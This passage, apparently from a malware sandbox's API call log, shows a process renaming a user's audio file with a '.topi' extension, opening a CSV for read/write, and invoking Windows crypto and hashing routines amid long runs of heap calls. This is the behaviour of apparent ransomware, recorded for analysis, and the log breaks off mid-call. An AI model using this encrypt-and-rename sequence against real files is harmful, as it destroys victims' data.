lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.010] CloseHandle (hObject=0x6a8) returned 1 [0096.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.011] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.011] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.011] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\_t22Wh63J4UmoxVIHba.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\_t22wh63j4umoxvihba.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\_t22Wh63J4UmoxVIHba.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\_t22wh63j4umoxvihba.m4a.topi")) returned 1 [0096.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.012] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.012] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.014] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc472e30, ftCreationTime.dwHighDateTime=0x1d5b8ed, ftLastAccessTime.dwLowDateTime=0x2aae72f0, ftLastAccessTime.dwHighDateTime=0x1d5b6d6, ftLastWriteTime.dwLowDateTime=0x2aae72f0, ftLastWriteTime.dwHighDateTime=0x1d5b6d6, nFileSizeHigh=0x0, nFileSizeLow=0x146b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_t22Wh63J4UmoxVIHba.m4a", cAlternateFileName="_T22WH~1.M4A")) returned 0 [0096.014] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.014] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.014] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0096.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.019] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.019] PathFindFileNameW (pszPath="") returned="" [0096.019] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\8KNJdo5s Y04PgsO.csv") returned=".csv" [0096.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\8KNJdo5s Y04PgsO.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\8knjdo5s y04pgso.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.019] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=61900) returned 1 [0096.019] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.023] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf1a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.023] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.024] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.025] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.025] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.025] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.025] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.025] GetLastError () returned 0x0 [0096.025] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.025] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.026] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.026] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.026] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf1d0) returned 0x9a06a00 [0096.026] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.026] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f24a8 [0096.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f24f0 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.027] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97b0 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9798 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.028] GetCurrentThreadId () returned 0x8c4 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 